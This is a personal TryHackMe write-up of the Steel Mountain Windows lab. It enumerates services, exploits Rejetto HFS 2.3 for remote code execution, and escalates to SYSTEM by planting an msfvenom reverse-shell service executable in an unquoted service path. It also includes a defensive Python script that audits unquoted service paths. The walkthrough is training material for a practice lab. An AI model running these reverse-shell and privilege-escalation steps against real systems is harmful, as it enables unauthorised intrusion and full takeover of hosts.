#tryhackme #windows #easy

![[Pasted image 20250707204904.png]]

---

# Information Gathering - Nmap

Started off with a TCP SYN scan against all 65,535 ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 21:29 CDT
Nmap scan report for 10.10.23.236
Host is up (0.16s latency).
Not shown: 58860 closed tcp ports (reset), 6660 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49163/tcp open  unknown
49164/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 40.40 seconds
```

Then I ran a service and script scan (`-sCV`) against the open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 80,135,139,445,3389,5985,8080,47001,49152-49164
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 21:31 CDT
Nmap scan report for 10.10.23.236
Host is up (0.13s latency).

PORT      STATE  SERVICE       VERSION
80/tcp    open   http          Microsoft IIS httpd 8.5
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2025-07-06T02:28:25
|_Not valid after:  2026-01-05T02:28:25
|_ssl-date: 2025-07-07T02:33:00+00:00; -1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2025-07-07T02:32:56+00:00
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open   http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open   msrpc         Microsoft Windows RPC
49153/tcp open   msrpc         Microsoft Windows RPC
49154/tcp open   msrpc         Microsoft Windows RPC
49155/tcp open   msrpc         Microsoft Windows RPC
49156/tcp open   msrpc         Microsoft Windows RPC
49157/tcp closed unknown
49158/tcp closed unknown
49159/tcp closed unknown
49160/tcp closed unknown
49161/tcp closed unknown
49162/tcp closed unknown
49163/tcp open   msrpc         Microsoft Windows RPC
49164/tcp open   msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-07-07T02:32:56
|_  start_date: 2025-07-07T02:28:19
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:eb:d3:88:2f:75 (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.35 seconds
```

Lastly, I ran a UDP scan against the top 1,000 ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 21:34 CDT
Nmap scan report for 10.10.23.236
Host is up (0.13s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
137/udp   open   netbios-ns
16697/udp closed unknown
49153/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds
```

---

# Footprinting

##### port 80 - HTTP

The landing page shows a picture of the employee of the month in the center.

![[Pasted image 20250706213735.png]]

His name appears to be `Bill Harper`. It's a good habit to note every name you find during enumeration, because those names can later be turned into a username or password wordlist.

![[Pasted image 20250706213842.png]]

##### port 8080 - HTTP

The service on port 8080 is `HttpFileServer`, as shown at the bottom left of the page. The version is `2.3`.

![[Pasted image 20250706214800.png]]

There are several products called HTTP File Server; the one running here is Rejetto's HFS, so `rejetto` is the name to search for.

![[Pasted image 20250706220506.png]]

Knowing the product name and version, I looked it up with `searchsploit`: this version has a known vulnerability, and it's remote code execution.

![[Pasted image 20250706221157.png]]

# Exploit - Using Metasploit

There are several public exploits for it, but I went with the `Metasploit` module because THM specifically asks for the Metasploit exploit.

In `C:\Users\bill\Desktop`, I found `user.txt`.

```powershell
meterpreter > dir
Listing: C:\Users\bill\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-09-27 06:07:07 -0500  desktop.ini
100666/rw-rw-rw-  70    fil   2019-09-27 07:42:38 -0500  user.txt

meterpreter > cat user.txt
b047...
```

# Privilege Escalation

To enumerate privilege escalation paths, we are going to use a PowerShell script called `PowerUp`. First, let's upload `PowerUp.ps1` from our local machine.

```bash
meterpreter > upload /opt/windows/PowerUp.ps1
[*] Uploading  : /opt/windows/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /opt/windows/PowerUp.ps1 -> PowerUp.ps1
[*] Completed  : /opt/windows/PowerUp.ps1 -> PowerUp.ps1
meterpreter > dir
Listing: C:\Users\bill\Desktop
==============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  600580  fil   2025-07-07 00:18:08 -0500  PowerUp.ps1
100666/rw-rw-rw-  282     fil   2019-09-27 06:07:07 -0500  desktop.ini
100666/rw-rw-rw-  70      fil   2019-09-27 07:42:38 -0500  user.txt
```

To run it from `Meterpreter`, we type `load powershell`, then `powershell_shell` to get a PowerShell prompt.

```bash
meterpreter > load powershell
Loading extension powershell...Success.
PS >
```

We import `PowerUp.ps1` by dot sourcing it and then run `Invoke-AllChecks`.

```powershell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
```

PowerUp reports an `Unquoted Service Path`: the service can be restarted and its directory is writable, which means we can place our own executable where the service loader will pick it up instead of the real application.

![[Pasted image 20250707002819.png]]

Use `msfvenom` to generate a reverse shell payload as a Windows service executable.

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
```

The payload has to go into the directory on the service's unquoted path where Windows looks first, `C:\Program Files (x86)\IObit\`, so that it is launched instead of the real service binary.
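To make the "why `Advanced.exe`, why that directory" step explicit, here is an added example (my own code, not part of the original write-up and not PowerUp's or winPEAS's logic) that audits service `ImagePath` values the way those tools do: an unquoted executable path containing spaces is tried by Windows at every space with `.exe` appended, so each of those prefixes is a location where a planted binary would be executed as the service account. The `AdvancedSystemCareService9` path is an assumed value consistent with the directory listing shown in this write-up; the other services are made up. The second half of the check, whether a low-privileged user can actually write to those candidate locations, is an ACL question that has to be answered on the host and is not done here. The `quote_image_path` helper produces the remediated form an administrator would write back to the registry.

```python
"""Audit Windows service ImagePath values for the unquoted-path weakness.

Added example. Windows' CreateProcess resolves an unquoted command line by
trying the string at each space boundary with ".exe" appended, e.g.
  C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
is tried as C:\Program.exe, then C:\Program Files.exe, then
C:\Program Files (x86)\IObit\Advanced.exe, then the real binary.
"""
import re

# Constructed sample: service name -> ImagePath as stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath.
# AdvancedSystemCareService9 is an ASSUMED path consistent with the
# write-up's directory listing; the other three services are made up.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "VendorAgent": r'"C:\Program Files\Vendor Name\agent.exe" --service',
    "Schedule": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "MyAppSvc": r"C:\Tools\My App\srv.exe /run -cfg C:\Program Files\My App\cfg.ini",
}

# Heuristic: the executable portion ends at the first ".exe"; anything after
# a following whitespace is treated as arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_image_path(image_path):
    """Return (exe_path, args, quoted) for an ImagePath value."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        if end == -1:                      # unterminated quote: take the rest
            return image_path[1:], "", True
        return image_path[1:end], image_path[end + 1:].strip(), True
    m = _EXE_RE.match(image_path)
    if m:
        return m.group(1), (m.group(2) or "").strip(), False
    return image_path, "", False           # no .exe found: whole value is the exe


def hijack_candidates(image_path):
    """Executables Windows may try before the real binary.

    Empty list means the path is quoted or has no space in its executable
    portion, i.e. the service is not affected by this weakness.
    """
    exe, _args, quoted = split_image_path(image_path)
    if quoted or " " not in exe:
        return []
    parts = exe.split(" ")
    # Every prefix that ends at a space boundary, with .exe appended.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quote_image_path(image_path):
    """Remediated ImagePath: executable wrapped in double quotes, args kept."""
    exe, args, _quoted = split_image_path(image_path)
    fixed = f'"{exe}"'
    return f"{fixed} {args}" if args else fixed


def audit(services):
    """Map each affected service to the locations that need an ACL review."""
    findings = {}
    for name, path in services.items():
        candidates = hijack_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for name, candidates in audit(SAMPLE_SERVICES).items():
        print(f"[!] {name}: unquoted path with spaces")
        for c in candidates:
            print(f"    would be tried first: {c}")
        print(f"    fix: ImagePath = {quote_image_path(SAMPLE_SERVICES[name])}")
```

Run on the sample, the audit flags `AdvancedSystemCareService9` and `MyAppSvc` only: the quoted vendor agent and `svchost.exe` (no space before the `.exe`) pass, and spaces that appear only in arguments, as in `MyAppSvc`'s `-cfg` value, do not add candidates. The candidate `C:\Program Files (x86)\IObit\Advanced.exe` is exactly the path the write-up drops its payload into; quoting the `ImagePath` removes every candidate.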
```powershell
PS > mv Advanced.exe 'C:\Program Files (x86)\IObit\'
```

```powershell
    Directory: C:\Program Files (x86)\IObit

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d----         7/6/2025  10:13 PM                Advanced SystemCare
d----        9/26/2019  10:35 PM                IObit Uninstaller
d----        9/26/2019   8:18 AM                LiveUpdate
-a---         7/6/2025  10:38 PM          15872 Advanced.exe
```

Back in `Meterpreter`, drop into a command prompt with `shell`. Then stop the original service `AdvancedSystemCareService9` and start it again, which will launch our payload.

```powershell
meterpreter > shell
Process 2824 created.
Channel 6 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
```

```bash
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2884
        FLAGS              :
```

Got a shell as `nt authority\system`.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.53.154] 49273
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```

Found `root.txt`.

```bash
 Directory of C:\Users\Administrator\Desktop

10/12/2020  12:05 PM    <DIR>          .
10/12/2020  12:05 PM    <DIR>          ..
10/12/2020  12:05 PM             1,528 activation.ps1
09/27/2019  05:41 AM                32 root.txt
               2 File(s)          1,560 bytes
               2 Dir(s)  44,156,801,024 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af...
```

# Exploit - Without using Metasploit

We get initial access with the same exploit, but this time using the Python version rather than the Metasploit module. Additionally, we need a static `netcat` binary: as the exploit's instructions say, a netcat binary has to be served from our web server. I downloaded it from here: https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

TryHackMe instructs us to run the exploit twice. The first run pulls our netcat binary onto the system and the second run executes our payload to get a callback.

![[Pasted image 20250707195106.png]]

As the screenshot below shows, the first run (`red box and red arrow`) retrieved my `nc.exe` binary and the second run (`blue box and blue arrow`) executed my payload, giving me a reverse shell as `bill`.

![[Pasted image 20250707200310.png]]

# Privilege Escalation

To find privilege escalation vectors quickly, I am going to use `winPEAS`. I transferred the file from my local Kali machine to the remote Windows system.

![[Pasted image 20250707202401.png]]

Running `winPEASx64.exe` revealed the same vulnerability we found with `PowerUp.ps1`.

![[Pasted image 20250707202903.png]]

We transfer the reverse shell payload `Advanced.exe` that we created earlier from my local Kali machine to the remote Windows machine.

![[Pasted image 20250707203518.png]]

Before running our payload, we need to stop the currently running service `AdvancedSystemCareService9`.

![[Pasted image 20250707203702.png]]

Copied the file to `C:\Program Files (x86)\IObit\Advanced.exe`, then started the service again.
![[Pasted image 20250707204551.png]]

As soon as the service started, I got the reverse shell on my listener :)

![[Pasted image 20250707204743.png]]